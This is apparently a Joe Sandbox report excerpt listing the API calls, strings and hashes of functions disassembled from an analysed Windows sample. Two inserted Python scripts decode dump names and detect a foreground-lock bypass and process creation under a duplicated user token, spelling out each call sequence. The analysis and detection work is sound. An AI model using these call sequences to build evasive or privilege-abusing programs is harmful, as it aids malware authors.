• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,02FB5FA0,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,02FB5FA0,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3100379633-4164748364
• Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
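The Memory Dump Source entries above name the region each function was disassembled from. The script below is an added example (editor's code, not Joe Sandbox's) that decodes those .sdmp file names: the fifth and seventh dot-separated fields take exactly the values of the Windows PAGE_* protection and MEM_IMAGE type constants, so they are read as the region's protection and type. That field mapping is inferred from the names on this page rather than documented behaviour, and the remaining fields are left opaque. The eight names embedded in the block are the ones listed above; the image base of 0x400000 comes from the report's "Offset: 00400000".

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names into region attributes.

Added example, not Joe Sandbox code.  Field semantics are inferred from the
names on this page: field 5 matches the Windows PAGE_* constants and field 7
matches MEM_IMAGE, so they are treated as Protect and Type.  Fields 1-3, 6
and 8 are not decoded (their meaning is not established here).
"""
import re
from dataclasses import dataclass

# winnt.h page protections (low byte; PAGE_GUARD/PAGE_NOCACHE are modifiers).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h region types.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"[0-9A-Fa-f]{8}\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int          # virtual address the region was dumped from
    protect: str       # decoded PAGE_* name, or raw hex if unknown
    region_type: str   # decoded MEM_* name, or raw hex if unknown
    executable: bool   # any PAGE_EXECUTE* protection


def is_sdmp_name(name: str) -> bool:
    return SDMP_RE.match(name.strip()) is not None


def decode_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    protect = int(m["protect"], 16)
    base_protect = protect & 0xFF  # drop modifier bits before the lookup
    rtype = int(m["type"], 16)
    return DumpRegion(
        name=name.strip(),
        base=int(m["base"], 16),
        protect=PAGE_PROTECT.get(base_protect, f"0x{protect:X}"),
        region_type=MEM_TYPE.get(rtype, f"0x{rtype:X}"),
        executable=bool(base_protect & 0xF0),
    )


def image_layout(names, image_base=0x400000):
    """(RVA, region) pairs sorted by address; RVA is relative to the PE image base."""
    regions = sorted((decode_sdmp(n) for n in names), key=lambda r: r.base)
    return [(r.base - image_base, r) for r in regions]


def executable_regions(names):
    """The dumps worth disassembling or scanning for code: executable pages."""
    return [r for r in (decode_sdmp(n) for n in names) if r.executable]


# The eight dump names listed in this report for process 5.
PAGE_DUMPS = [
    "00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp",
    "00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp",
]

if __name__ == "__main__":
    for rva, r in image_layout(PAGE_DUMPS):
        print(f"RVA 0x{rva:06X}  {r.protect:<24} {r.region_type}  {'exec' if r.executable else ''}")
```

Run against the names above, only the 0x401000 dump is executable (the code section); the 0x490000-0x4A7000 dumps are writable data pages, which is where a decrypted configuration or staged payload would be found rather than in the image's read-only sections.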
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
• keybd_event.USER32(00000012,00000000), ref: 004344FD
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
• keybd_event.USER32(00000012,00000000), ref: 00434514
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 2889586943-2988720461
• Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
• Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• CloseHandle.KERNEL32(?), ref: 004463A0
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• GetProcessWindowStation.USER32 ref: 004463D1
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• _wcslen.LIBCMT ref: 00446498
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _wcsncpy.LIBCMT ref: 004464C0
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
• CloseWindowStation.USER32(00000000), ref: 0044656C
• CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
• String ID: $@OH$default$winsta0
• API String ID: 3324942560-3791954436
• Opcode ID: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
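Two of the API lists above each spell out a recognisable Windows technique: the Shell_TrayWnd routine attaches its input queue to the target thread and injects Alt keystrokes (keybd_event with virtual key 0x12) before calling SetForegroundWindow, which is the standard way round the foreground-lock restriction, and the winsta0/default routine duplicates a token as a primary token (DuplicateTokenEx with SecurityImpersonation and TokenPrimary), opens the interactive window station and desktop, loads the user profile and calls CreateProcessAsUserW. The script below is an added example, not Joe Sandbox code and not code from the analysed sample; it parses the report's `• Api.MODULE(args), ref: ADDR` lines and flags both sequences. The embedded inputs are a subset of the API lines copied from this page, and the pattern names and behavioural reading are the editor's, not labels Joe Sandbox assigns.

```python
"""Parse Joe Sandbox per-function API lists and flag two call sequences seen
in this report: the foreground-lock bypass (AttachThreadInput + Alt keystrokes
before SetForegroundWindow) and process creation under a duplicated primary
token on winsta0\\default.

Added example, not Joe Sandbox code and not code from the analysed sample.
SAMPLE_FOREGROUND / SAMPLE_RUNAS are API lines copied from this page (subset).
"""
import re
from dataclasses import dataclass
from typing import Optional

BULLET = "\u2022"  # the report's list marker
# "<bullet> [Part of subcall function ADDR: ]Api.MODULE[(args)], ref: ADDR"
API_LINE = re.compile(
    rf"^\s*{BULLET}\s*(?:Part of subcall function (?P<sub>[0-9A-F]{{8}}):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple
    ref: int                   # call-site address in the dumped image
    subcall_of: Optional[int]  # function this call was pulled in from, if marked

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int; None if absent, unresolved ('?') or a string."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        try:
            return int(self.args[i], 16)
        except ValueError:  # e.g. Shell_TrayWnd, winsta0
            return None


def parse_api_lines(text: str) -> list:
    """Turn one 'APIs' block into Call records; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] is not None else ()
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


VK_MENU = 0x12  # virtual-key code for Alt

def forced_foreground(calls) -> list:
    """Refs of SetForegroundWindow calls issued after the thread attached its input
    queue to the target and injected Alt presses.  Windows only lets the process
    that last received input take the foreground; the fake Alt presses satisfy
    that rule, so this ordering is the bypass, not a plain activation."""
    attached = alt_pressed = False
    hits = []
    for c in calls:
        if c.api == "AttachThreadInput":
            attached = True
        elif c.api == "keybd_event" and c.arg_int(0) == VK_MENU:
            alt_pressed = True
        elif c.api == "SetForegroundWindow" and attached and alt_pressed:
            hits.append(c.ref)
    return hits


SECURITY_IMPERSONATION, TOKEN_PRIMARY = 2, 1  # DuplicateTokenEx args 4 and 5

def run_as_other_user(calls) -> Optional[dict]:
    """Detect DuplicateTokenEx yielding a primary token, then window station and
    desktop opened by name, then CreateProcessAsUserW."""
    needed = {"OpenWindowStationW": None, "OpenDesktopW": None, "CreateProcessAsUserW": None}
    primary_token = False
    for c in calls:
        if (c.api == "DuplicateTokenEx" and c.arg_int(3) == SECURITY_IMPERSONATION
                and c.arg_int(4) == TOKEN_PRIMARY):
            primary_token = True
        elif c.api in needed and needed[c.api] is None:
            needed[c.api] = c
    if not primary_token or not all(needed.values()):
        return None
    return {"winsta": needed["OpenWindowStationW"].args[0],
            "desktop": needed["OpenDesktopW"].args[0],
            "create_ref": needed["CreateProcessAsUserW"].ref,
            "loads_profile": any(c.api == "LoadUserProfileW" for c in calls)}


SAMPLE_FOREGROUND = """\
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
"""
SAMPLE_RUNAS = """\
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• _wcslen.LIBCMT ref: 00446498
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
"""

if __name__ == "__main__":
    print("forced foreground at:", [hex(r) for r in forced_foreground(parse_api_lines(SAMPLE_FOREGROUND))])
    print("run-as-user:", run_as_other_user(parse_api_lines(SAMPLE_RUNAS)))
```

Only the SetForegroundWindow call at 0043451E is flagged: the earlier two at 0043446A and 004344B7 precede the Alt keystrokes and are ordinary activation attempts, which is why the detector tracks order rather than mere presence of the APIs. The same parser accepts every API list on this page, including the "Part of subcall function" entries, which keep their parent address in `subcall_of`.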
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: 55a3c3eb22fc06341cb360cdc15f1a7bf5461d7a98e87c474a269a602399cf4a
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: 55a3c3eb22fc06341cb360cdc15f1a7bf5461d7a98e87c474a269a602399cf4a
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
• FindClose.KERNEL32(00000000), ref: 00478924
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
• __swprintf.LIBCMT ref: 004789D3
• __swprintf.LIBCMT ref: 00478A1D
• __swprintf.LIBCMT ref: 00478A4B
• __swprintf.LIBCMT ref: 00478A79
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
• __swprintf.LIBCMT ref: 00478AA7
• __swprintf.LIBCMT ref: 00478AD5
• __swprintf.LIBCMT ref: 00478B03
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 999945258-2428617273
• Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
• Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
• Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                    Strings
                                                                                                                                                    • Unterminated string, xrefs: 00428348
                                                                                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                    • Error opening the file, xrefs: 00428231
                                                                                                                                                    • _, xrefs: 0040371C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                    • API String ID: 3393021363-188983378
                                                                                                                                                    • Opcode ID: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                                                                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                    • Opcode Fuzzy Hash: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                                                                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
